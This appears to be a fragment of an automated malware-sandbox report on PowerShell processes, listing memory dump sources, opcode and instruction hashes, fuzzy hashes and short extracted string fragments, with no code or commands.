                                                                                                            • Opcode Fuzzy Hash: f95eb416bf39f89ac7ed2e818c851089832c48f79dc342c8da2d6a9a54dc83d2
                                                                                                            • Instruction Fuzzy Hash: ADB13422B0EB8A0FE7D5DB2848B56B97BD1EF56310B4841BEC10DC75A3DE1DAC019340
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a40f987e28233526c7d5eb2f985f9813d4fe91b9bb5e6b10cff56a661ae30d60
                                                                                                            • Instruction ID: e060f68a135bfb532b6856a06925305704ad3b0b8c3ddb9866a14bd346769c9d
                                                                                                            • Opcode Fuzzy Hash: a40f987e28233526c7d5eb2f985f9813d4fe91b9bb5e6b10cff56a661ae30d60
                                                                                                            • Instruction Fuzzy Hash: CDE1E322B0EB860FE79A976858B51757BD1EF53710F0841BED28DC71A3EE1DA806A341
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f19b0df6575c4b16cf21c2331c1f43b8a1e8d3a027f2832ed79e066e4ea8414b
                                                                                                            • Instruction ID: 95f64732740af0ffbe17b14bfd73a8c089caab024d4879d0848625c211d26533
                                                                                                            • Opcode Fuzzy Hash: f19b0df6575c4b16cf21c2331c1f43b8a1e8d3a027f2832ed79e066e4ea8414b
                                                                                                            • Instruction Fuzzy Hash: 0DB1C67061DA4D8FDBA8DF28C8557E93BE1FF55310F04426EE84DC7292CA78A9458BC2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1536799230b91955c3efed5bc7db70a9622508de51dbaea71ec6e8e1e044a228
                                                                                                            • Instruction ID: 76743796342ebdd758af6e1df8b29ccbcc186224949631055d138c8ac578b310
                                                                                                            • Opcode Fuzzy Hash: 1536799230b91955c3efed5bc7db70a9622508de51dbaea71ec6e8e1e044a228
                                                                                                            • Instruction Fuzzy Hash: 6841B662B0EBC50FF796976848B52A87BD1EF56220F0841FED19CC71D3DD2C6846AB42
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 17939b13e0d8a2679c9ae66da1d5ee822c49240cf5809ac7c04c56bb6a9d9a1d
                                                                                                            • Instruction ID: dd8e7d6b82d4468a76563b10a686d433fe83cc3b0a1720e14f137cf21b0509ab
                                                                                                            • Opcode Fuzzy Hash: 17939b13e0d8a2679c9ae66da1d5ee822c49240cf5809ac7c04c56bb6a9d9a1d
                                                                                                            • Instruction Fuzzy Hash: 2641B662B0EBC50BF792976848B52A8BBD1EF56224F0841FED15CC71D3DD2C6846AB41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 141e415e0610e39d3444bb4af4e17c304a2e09b38eea3968fbd46242bcf2181b
                                                                                                            • Instruction ID: ccd0ed73f7493dde8fab2e20eb1b63bf74bbaf981b6f960454b5d8c59002bdb2
                                                                                                            • Opcode Fuzzy Hash: 141e415e0610e39d3444bb4af4e17c304a2e09b38eea3968fbd46242bcf2181b
                                                                                                            • Instruction Fuzzy Hash: FA31FE62F0FA970BF3E8971858B12B9AAC2BF56750F9841BAD60DE75D3DD0DA8007241
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 953be3b356911f7b49ca4ad321abdcaa20ec661352f7c46c451802d2911ff978
                                                                                                            • Instruction ID: 80bd5eec7a67d28fdf8218eab067795dd8e7877884f4ca91bda74d3b80251b08
                                                                                                            • Opcode Fuzzy Hash: 953be3b356911f7b49ca4ad321abdcaa20ec661352f7c46c451802d2911ff978
                                                                                                            • Instruction Fuzzy Hash: FD21D622B1DE4A4BF3A9971858F1274AAC2FF96750B9840BAD28DC7193DD1DAC017241
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 053ae903a7e28b9c0677e185ae80f3941e0ed88ea2ee9a544fd6d4387e3a7a2e
                                                                                                            • Instruction ID: 4d9a1ed8120eec8c9a5150f1b5188defbd3e2e3ad91b13e83b9808aabfcb2b66
                                                                                                            • Opcode Fuzzy Hash: 053ae903a7e28b9c0677e185ae80f3941e0ed88ea2ee9a544fd6d4387e3a7a2e
                                                                                                            • Instruction Fuzzy Hash: 61313E70A2A64DCEFBB4DF15CC59BF93295FB42315F400538D61DC6182CA3C7945CA81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d47af79fc72c2fb379bdb90585ce317385320fe17df709ab1521d8794b5387b
                                                                                                            • Instruction ID: 978b9b0a0ce5fa87976036290e0fa58a074b9e63989305229e0e405e5d6f59b5
                                                                                                            • Opcode Fuzzy Hash: 3d47af79fc72c2fb379bdb90585ce317385320fe17df709ab1521d8794b5387b
                                                                                                            • Instruction Fuzzy Hash: 4021F562F0E9860FE7AD972818F51B56A81EF96740F1840BED09EC72D3DC1C6809A352
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                            • Instruction ID: 7d30c608dc5fc945c0f42e69edd01d182e8dec87fe7e4054c1bfd2e37747d8d1
                                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                            • Instruction Fuzzy Hash: 4001677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3651D636E881CB45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 536551fa0fae3e0a5570ec4556d6248add7beec3a8112ac5d5ae34ea5d4a3d15
                                                                                                            • Instruction ID: 66d1f94b5a1170f0b13c2107a444e97bd3bc3db30ee3f69cb9562c65b6214175
                                                                                                            • Opcode Fuzzy Hash: 536551fa0fae3e0a5570ec4556d6248add7beec3a8112ac5d5ae34ea5d4a3d15
                                                                                                            • Instruction Fuzzy Hash: 62F0E533B0CE4D0EE795A26C58651F9B3C2EFC6131B554177C14EC3156ED16A4169200
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 016b2091733e5388a90edb5de64f38784f48eccbff31f0bd26ed767c38ef50f3
                                                                                                            • Instruction ID: 407e8a79f5bb14bfd315d0216092faae0c8bae40cd70a76c42e258bd3353a970
                                                                                                            • Opcode Fuzzy Hash: 016b2091733e5388a90edb5de64f38784f48eccbff31f0bd26ed767c38ef50f3
                                                                                                            • Instruction Fuzzy Hash: 6AF08232A099494FDF91EB5894555E977F0FF6931170400BBE10DD3252CE28A844C741
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 016b2091733e5388a90edb5de64f38784f48eccbff31f0bd26ed767c38ef50f3
                                                                                                            • Instruction ID: 41c91782e7a66fe17b5c2d0894187d3fe0b902c779b7c97178f5c919a7a7b71b
                                                                                                            • Opcode Fuzzy Hash: 016b2091733e5388a90edb5de64f38784f48eccbff31f0bd26ed767c38ef50f3
                                                                                                            • Instruction Fuzzy Hash: 4AF0A732B099494FDF95EF5C94555E977F1FF6931170000BBE10DD3252CE29A848C741
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f75df37594c414c15afffd267fb29b1022115eec756522ca7118488abe1197ff
                                                                                                            • Instruction ID: 9cd50a1c6d90f19eef86d4501bac6ff6772eece43cf604cdf96d0b8aa494ae67
                                                                                                            • Opcode Fuzzy Hash: f75df37594c414c15afffd267fb29b1022115eec756522ca7118488abe1197ff
                                                                                                            • Instruction Fuzzy Hash: 2FE06D2170D9454FDB95EA5C94A18A477E0EF6931031401ABE009C7297D929AC858781
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299486572.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 546abe5fe460ca051c1ce362eb00122149c86bc332b3c04b8b223e02e31ff4f5
                                                                                                            • Instruction ID: f52b955fbd821e0e7cf7258a7244b9a2f43c22bf56a08d7b8633dd9298f144fd
                                                                                                            • Opcode Fuzzy Hash: 546abe5fe460ca051c1ce362eb00122149c86bc332b3c04b8b223e02e31ff4f5
                                                                                                            • Instruction Fuzzy Hash: 2BE0DF33B1DB0A0AFB68665C28720F8B3D5EF82120744083FD34EC2443EC1AA8264644
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e3ce40cb2d2e540bc3d72f044519739ea69d34636d9f72d98e535c049a3dcd0
                                                                                                            • Instruction ID: be4ef4f2734f9de2ff7e971b55f15d0b1836749aa47c1a73a0ae9e6f9c24dde6
                                                                                                            • Opcode Fuzzy Hash: 3e3ce40cb2d2e540bc3d72f044519739ea69d34636d9f72d98e535c049a3dcd0
                                                                                                            • Instruction Fuzzy Hash: 65122772B0DA868FDB91DF6CD8A65E93BE0EF57310B0401B6C548C7292CE2CA846D7D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c8388a904d842bf7821c65a05d011ff6ed77ac53f068eaf9e28e1b0747376b7d
                                                                                                            • Instruction ID: 4bc0615f4ba31c1ca721a9e83ca051195d332d2b61d25b5b32a1701ee47e5c24
                                                                                                            • Opcode Fuzzy Hash: c8388a904d842bf7821c65a05d011ff6ed77ac53f068eaf9e28e1b0747376b7d
                                                                                                            • Instruction Fuzzy Hash: 37D1E7A6A0F7C29FD752976898F50E53FA0EF5322470901FBC5C9CB1A3D91E6806D392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cfaccd8e6f68da4b9c5d1526ec52ca358827e73d741ed6b7629ca02c2928c797
                                                                                                            • Instruction ID: d8e2c2fb8de6dcb8fe16d82e4db825caf51bf0327151c4aad3bf8bbdf26776d9
                                                                                                            • Opcode Fuzzy Hash: cfaccd8e6f68da4b9c5d1526ec52ca358827e73d741ed6b7629ca02c2928c797
                                                                                                            • Instruction Fuzzy Hash: E7C14597A4F6D25FF7A2463858B60E97F94EF5322470901F7C6D8C7193D90E380AA392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24894aad9d5ba6a296ebe725f79d15aef4b6cf84d1ac3597337587ccd0fb7b5a
                                                                                                            • Instruction ID: 389504a479e424acec79377cd2383efb87a912d288a164e2c14dde0e6b87b788
                                                                                                            • Opcode Fuzzy Hash: 24894aad9d5ba6a296ebe725f79d15aef4b6cf84d1ac3597337587ccd0fb7b5a
                                                                                                            • Instruction Fuzzy Hash: B3B118B1E0DA498FDBA1DB5CD4E4AE97BE1FF56310F040176D589D72A2DA28B842C7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2299025360.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cb17585dc276f59ae6d451975bb56ad4030e349d2a2845e3946f8d9137465d83
                                                                                                            • Instruction ID: d80449fabb86b5f20f9c0c2b71b926952246f80d527fcb61fec70d6870934bdb
                                                                                                            • Opcode Fuzzy Hash: cb17585dc276f59ae6d451975bb56ad4030e349d2a2845e3946f8d9137465d83
                                                                                                            • Instruction Fuzzy Hash: 27716297A0E7D25FE763473C58B60E93FA49F5322470901F7D6C8CA293DD0C681AA362
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2412969594.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_4c60000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 42b44dc00a1e759cadad16f0d236beeb24f1529d0851a5f7cf9989250ae95af0
                                                                                                            • Instruction ID: 64accd1ba1dc7548678f83157c2aebff8f79e612e5810ff36b9d374609b1f939
                                                                                                            • Opcode Fuzzy Hash: 42b44dc00a1e759cadad16f0d236beeb24f1529d0851a5f7cf9989250ae95af0
                                                                                                            • Instruction Fuzzy Hash: E5B16F74E00209DFDF14CFA9C8857AEBBF2BF88714F14C52AD416A7294EB74A945CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2412969594.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_4c60000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d142801cfd1f4dc10ae545c90d16c94f40a6624f0b29b59ef470ebb2346a9047
                                                                                                            • Instruction ID: 2799f96e5e75ecfecd18383144b44db1d4390a93094ed3b0dbf5af8858162cce
                                                                                                            • Opcode Fuzzy Hash: d142801cfd1f4dc10ae545c90d16c94f40a6624f0b29b59ef470ebb2346a9047
                                                                                                            • Instruction Fuzzy Hash: 6FB15D71E002098FDF10CFA9E8957ADBBF2AF88714F14C52DD816A7294EB74A945CF81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl$(fdl$(fdl$(fdl$84bl$84bl$84bl$84bl$x.Uk$-Uk
                                                                                                            • API String ID: 0-1805236565
                                                                                                            • Opcode ID: a648eef645d2b5ade9615818db5935fa674faeaf01d27e43f351b62321500ac2
                                                                                                            • Instruction ID: dcb8eae2ec8517a0112171ffe6c1a1b0ba1f950a85f755c4b228016189cf437f
                                                                                                            • Opcode Fuzzy Hash: a648eef645d2b5ade9615818db5935fa674faeaf01d27e43f351b62321500ac2
                                                                                                            • Instruction Fuzzy Hash: A062B2B0B04209DFDB149F68C444BAEBBB2AFC9715F14846AE512AF785CB71DC41CBA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl$(fdl$(fdl$(fdl$(fdl$(fdl$(fdl$(fdl$tLVk
                                                                                                            • API String ID: 0-3498011416
                                                                                                            • Opcode ID: 38b902cd923e00b19fd3209667c73579bd680ebff573d0825ae56a56d53cdd34
                                                                                                            • Instruction ID: 02a37dffed918d7b57181b2962753dcb275f41cf11557a66f860a48afdf13c54
                                                                                                            • Opcode Fuzzy Hash: 38b902cd923e00b19fd3209667c73579bd680ebff573d0825ae56a56d53cdd34
                                                                                                            • Instruction Fuzzy Hash: 7B926BB4E00215DFE714CB68C854F9ABBB2AFC5704F14C099E91A9B752CB71ED828F52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl$(fdl$x.Uk$x.Uk$-Uk
                                                                                                            • API String ID: 0-4266782523
                                                                                                            • Opcode ID: e4c1d786d13f987fb9a0ebaec733efb4a6e410b62d9081ce8abfc85728442e4b
                                                                                                            • Instruction ID: 467e055d843283439f0664da289cb60e650e9745b01201628064657266dcaf88
                                                                                                            • Opcode Fuzzy Hash: e4c1d786d13f987fb9a0ebaec733efb4a6e410b62d9081ce8abfc85728442e4b
                                                                                                            • Instruction Fuzzy Hash: F5F1AFB0A00215DFE724DB68C855BAEBBB2AFC4744F14C099E509AF791CB75EC418F91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl$(fdl$(fdl$(fdl$x.Uk
                                                                                                            • API String ID: 0-3704176432
                                                                                                            • Opcode ID: 06fffa2503e00bce893ce5735c4e3b5ba4a4057de2af5a0480f990a0b52ebc0e
                                                                                                            • Instruction ID: 0b2c4836a8f9d0fa17367cf70d43f0678ae9c01803766747a4816d1b64ea2eed
                                                                                                            • Opcode Fuzzy Hash: 06fffa2503e00bce893ce5735c4e3b5ba4a4057de2af5a0480f990a0b52ebc0e
                                                                                                            • Instruction Fuzzy Hash: DFB181B0B00205DFE714DBA8C545BAEBBE2AFC8704F10C069E516AB751DB76DC418B96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl$(fdl$x.Uk$-Uk
                                                                                                            • API String ID: 0-1323565126
                                                                                                            • Opcode ID: 23ae29f6f290b6ff2dc7879e98cbb6eaa9f6ba64c084df49b02e373f946724aa
                                                                                                            • Instruction ID: 852900e5d76e8916a6947328a2068ff6f7f629e107432ff3c040d72e983d7fc6
                                                                                                            • Opcode Fuzzy Hash: 23ae29f6f290b6ff2dc7879e98cbb6eaa9f6ba64c084df49b02e373f946724aa
                                                                                                            • Instruction Fuzzy Hash: 80C18EB0A04205DBDB24DF94C441BAEBBB2AFC8705F14C419D9266F745CB76AC42CFA2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl$(fdl$x.Uk
                                                                                                            • API String ID: 0-745258820
                                                                                                            • Opcode ID: 85de377c57ab38253d72f7e2965522a165c5eab92d1c9c30b06002ae774acb15
                                                                                                            • Instruction ID: 5d6c85be26f160269636577ad71cf47f76684087bc4bfbf513c662e511836b02
                                                                                                            • Opcode Fuzzy Hash: 85de377c57ab38253d72f7e2965522a165c5eab92d1c9c30b06002ae774acb15
                                                                                                            • Instruction Fuzzy Hash: 25A16CB0A00201EFE714DB98C545BAEBBF2AFC8704F10C069E916AB751DB76EC41CB95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: x.Uk$-Uk
                                                                                                            • API String ID: 0-1205924037
                                                                                                            • Opcode ID: 73dff0a0c2427c1d16ab3409f2f3f8730bb40b59628706dda156b23a3b21e66c
                                                                                                            • Instruction ID: fa2eb652317f759ca72a79791a53b100f32b9669bd788e360bf3bd43a29004bf
                                                                                                            • Opcode Fuzzy Hash: 73dff0a0c2427c1d16ab3409f2f3f8730bb40b59628706dda156b23a3b21e66c
                                                                                                            • Instruction Fuzzy Hash: 93D17EB4A00205DBD718DBA8C455BAEBBB2AFC8754F24C019D5126F355CBB9EC428F92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: x.Uk$-Uk
                                                                                                            • API String ID: 0-1205924037
                                                                                                            • Opcode ID: 75ac1ebc8dea96c73c6492016e6bf9dcd0095535705efc3bc81c4ae9ef614f1f
                                                                                                            • Instruction ID: bd1984546bd9e1942f87617f9d2d6ac7c695d4a45b5ee7b8be36816145bd3f85
                                                                                                            • Opcode Fuzzy Hash: 75ac1ebc8dea96c73c6492016e6bf9dcd0095535705efc3bc81c4ae9ef614f1f
                                                                                                            • Instruction Fuzzy Hash: B4D18EB0A00215DFEB14DBA8C855B9EBBB2EBC4744F10C099D509AF385CB75DD828F92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: x.Uk$-Uk
                                                                                                            • API String ID: 0-1205924037
                                                                                                            • Opcode ID: d83d47516e4502d71c5b75b879483b463efd0d401465af1512c05a7bc6a7c7fa
                                                                                                            • Instruction ID: 55d051933b4f4497ce4453fec74423ece72447bc5c3605d1a71cb94e2b31b5d3
                                                                                                            • Opcode Fuzzy Hash: d83d47516e4502d71c5b75b879483b463efd0d401465af1512c05a7bc6a7c7fa
                                                                                                            • Instruction Fuzzy Hash: 4AB16BB4A00205DFDB18DB68C455BAABBB2AFC8714F14C059E9126F356CB79EC42CF91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2439289184.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ad0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (fdl
                                                                                                            • API String ID: 0-1292725391
                                                                                                            • Opcode ID: 98710c60c64add6a5110f36a9675a81bc18c46586f4da81b8f560a0e78a9b96c
                                                                                                            • Instruction ID: 9930438cd76eaf6bbae5cb79e5d8a3506d200ec4548d1b40ff67d2a1809b6a45
                                                                                                            • Opcode Fuzzy Hash: 98710c60c64add6a5110f36a9675a81bc18c46586f4da81b8f560a0e78a9b96c
                                                                                                            • Instruction Fuzzy Hash: DD224EB4A00215DFE724CB18C854FA9B7B2AF85704F15C0D5E51AAB352CB72ED92CF52
                                                                                                            Memory Dump Source
